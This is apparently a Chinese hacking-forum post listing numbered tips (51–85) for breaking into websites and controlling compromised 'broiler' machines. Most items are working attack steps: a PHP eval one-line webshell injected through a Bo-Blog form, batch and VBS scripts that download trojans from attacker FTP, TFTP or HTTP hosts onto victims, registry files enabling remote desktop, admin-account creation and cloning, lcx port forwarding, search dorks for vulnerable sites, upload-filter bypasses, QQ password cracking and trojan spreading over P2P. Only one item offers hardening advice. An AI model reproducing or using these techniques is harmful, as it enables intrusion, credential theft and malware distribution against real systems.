黑客动画总结(二)

作者:阿汀qq86494359 来源:www.hack6.com

上次总结网宽网络的漏洞,他们的负责人找过我,我在这里声明我从没有黑过网宽网络的相关任何站点,这个负责人满口脏话,素质有待提高.而且他说他从没有把任何他做的企业网站放在眼里,还故意加了漏洞,这是他的原话,真可悲呀.
各大黑客网站每天更新的新闻不少,可适合菜鸟的很少,希望我总结的文章菜鸟能看懂并消化。
以下6条是我希望大家做个动画出来的,我想做但没时间啊,我忙着做毕业论文“城市污水脱氮除磷”,郁闷啊,做动画的时候别忘了提一下我阿汀呀:)
动网7.1又出现固顶漏洞,只要有固定权限就能提升为管理员。
Serv-U6.0.0.2的将用户密码存在注册表里的漏洞,本地构造注册表用户导入。
这个月我终于在网上下载到了Windows ASN.1远程溢出工具,强烈推荐。
利用Ewebeditor得到webshall的漏洞,主要因为管理员没改默认设置。
有时候遇到2003的机子,权限bt,有了webshell,但是什么也干不了,可以传个aspx的马看看,一般管理员加强了asp的权限设置,却忽略了系统帐号asp.net。
有时候上传过滤掉了字符”asp”,但是我们改为“aaspsp”即可

下面继续总结这十天的动画:

51.这个软件大家一定要会用 我每天少说也要打个一两遍
psu.exe -p regedit –i 系统进程的pid (用system权限打开注册表)
然后开3389 手工克隆guest

52.搜索wishshow.asp?id= 找到大量的许愿板程序
注意:显示友好HTTP信息这个钩一定要去掉
然后用%5c暴库,MDB格式,直接下载,如果是asp,asa格式,插一句话木马到许愿内容里

53.显示友好HTTP信息这个钩先去掉
搜索 关键字:版权所有: AspSky.Net
后面加个upfile.asp 提示有错误,用老兵的工具上传马

54.如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
@echo off
date /t >c:/3389.txt
time /t >>c:/3389.txt
attrib +s +h c:/3389.bat
attrib +s +h c:/3389.txt
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
并保存为3389.bat
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号

55.有时候提不了权限的话,试试这个命令,在命令行里输入:
start http://www.hack6.com/ms05020.htm然后点执行。(ms05020.htm是你上传好的ms05020漏洞网页)
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令

56.有时候默认安装会留下phpcksec.php这个文件,可以远程查看系统文件
比如http://206.123.66.205/phpcksec.php?path=c:\ 可以看到c:下的文件

57.QQ还有翻译功能 比如我们用WINNTAutoAttack在韩国肉鸡扫到的了ip地址,里边还有一些韩文,复制到QQ里,就变成了中文

58.在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
echo 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
echo bin >>c:\1.bat //登入
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
然后执行ftp -s:c:\1.bat即可

59.如果你在外网那就简单了,不用第58条那么麻烦,这招大家都会,复习一下吧
本地用具开tftp服务 然后执行tftp -i IP地址 get 下载的文件 c:\ating.exe

60.Hide Admin ,很多黑客用来隐藏肉鸡上管理员账号的工具,不过管理员账号必须有$,它是可以隐藏超级账户的工具,隐藏后的账户不但在命令下看不到,而且在计算机管理或用户账号管理中都看不到其踪影,但是不要高兴的太早了,用Guest删除大师很容易就看得到的。网管要留意。

61。上次总结介绍了开3389的五种方法,这次再介绍两种
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
>>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
(2)winxp和win2003终端开启
用以下ECHO代码写一个REG文件:
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
然后regedit /s 3389.reg del 3389.reg
XP下不论开终端还是改终端端口都不需重启

62. 在baidu.com搜索:
“本站仅提供影视欣赏方面的信息和链接,由所有网友一起维护,相关连接内容版权归原网站所有,影片版权归相关影音公司所有,相关链接站点提供观看的影片仅供宽带网用户测试研究用途,如侵犯到你的权利速通知我们,我们确认之后将立即清除”
其中很多站点都有注入漏洞的

63.需要0825版QQ,先用QQ号码生成器生成字典(密码相同),然后导入qq扫号辅助工具eQQPass来破解一组QQ号码。

64.有时我们注入网站时管理员帐号和密码已成功猜解,但就是找不到后台,可以用flashget试试找一下,复制网站地址比如http://www.hack6.com,打开flashget,进入工具——站点资源探索器,粘贴地址,登陆,也许就能找到后台

65.加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
(1)数据库文件名应复杂并要有特殊字符
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
将conn.asp文档中的
DBPath = Server.MapPath("数据库.mdb")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath

修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
(3)不放在WEB目录里

66.找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'

67.登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
@del %SYSTEMROOT%\system32\dllcache\query.exe
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的

@echo off
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
@del c:\winnt\system32\tsadmin.exe
@del %SYSTEMROOT%\system32\dllcache\tsadmin.exe

68.映射对方盘符
telnet到他的机器上,
net share 查看有没有默认共享 如果没有,那么就接着运行
net share c$=c:
net share现在有c$
在自己的机器上运行
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K

69.一些很有用的老知识
type c:\boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8

70.如果对方没开3389,但是装了Remote Administrator Service
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"

71.动网超市插件默认数据库 /bbs/data/shop.asp 再申请入驻里插入一句话木马

72.打破QQ好友500人的上限,QQ的上限只能加到500人左右,步骤如下:我的电脑由于有很多个盘所以下载了2个客户端第一个在D盘第2个在C盘我以前一直上第一个客户端了把好友加到了500个满了接下来呢我换上第2个客户端然后删除一部分好友,然后在加满500人加这500人不要和删除的那些人重复,在返回第一个客户端由于系统缓存还驻留着以前的好友信息,在加上新更新的信息所以就可以突破QQ好友上限的限制了

73.搜索关键词:动网先锋论坛-论坛首页,这个是默认的,如果有人这个没修改的话就意味这可能管理员没修改密码或是新装的论坛可以利用下

74.搜索.com images admin或.Jp images admin等等,能搜到很多好东东

75.搜索普世购物系统,后台管理员的默认帐号和密码是:admin1 admin1,漏洞文件是up_BookPicPro.asp,用动感商城上传工具上传马。

76,有时候入侵网站,后面加上/xyvod/,这是AspShop电影欣赏系统的数据库路径,用AspShop电影欣赏系统数据库下载数据库,后台登陆。

77.免费开通商务伴侣教程,先用TM登陆,点上面的商务伴侣,再进入我的商务伴侣,继续点开通我的商务伴侣,现在商务伴侣已经激活了,点免费使用即可。

78. 打开网站猎手,关键打powered by mypower用的漏洞不是以前的upfile_soft.asp跟upfile_softpic.asp而是upfile_adpic.asp跟upfile_photo.asp。用法跟upfile_softpic.asp是一样的道理,大家慢慢搜,有很多这样的漏洞。

79.Bo-Blog的新漏洞出现,网址/index.php?job=../admin/ban,
然后将下列代码存为htm,然后插一句话马到禁止搜索的bansearch.php里,
<table cellpadding=0 cellspacing=0 align=center width='95%' bgcolor='#000000'>
<tr><td>
<table cellpadding=5 cellspacing=1 width='100%'><form action="网址/index.php?job=../admin/ban" method=post>
<tr bgcolor='#E9F2FC'><td colspan=2><font color="#000000">禁止搜索的词</font></td></tr>
<tr bgcolor='#FFFFFF'><td width=20%>无意义词</td><td><textarea name="bansearch" rows=15 cols=80><?php @eval($_POST[cmd])?></textarea></td></tr><input type=hidden name=action value=savebansearch>
<tr bgcolor='#FFFFFF'><td colspan=2>为了避免胡乱搜索,可以将一些常用词列入禁止搜索<br/>程序已经禁止了少于三个字节(一个汉字)的词语搜索</td></tr>
<tr bgcolor='#FFFFFF'><td colspan=2 align=center><input type=submit value=提交> <input type='reset' value=复原>
</td></tr></form>
</table>
</td></tr>
</table></td>
</tr>
</table>

80. URL欺骗与网页木马的完美结合,
<frameset rows="444,0" cols="*">
<frame src="http://www.163.com" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="http://木马网页" framborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
表面看是163的网页,实际是中了马

81.打击六合彩!搜索“请各位验证会员料”,网址/ziyu/1login.asp,把最后的换成conn.inc,可以看到数据库。

82.用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)

82.用p2p软件散播木马很快的,没鸡的朋友试试。

83.蓝雨设计整站有SQL注入漏洞

84.在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
(这是完整的一句话,其中没有换行符)
然后下载:
cscript down.vbs http://IP/hack6.exe hack6.exe

85.有时候用老版加壳软件给马加壳效果更好。

相关日志

发表评论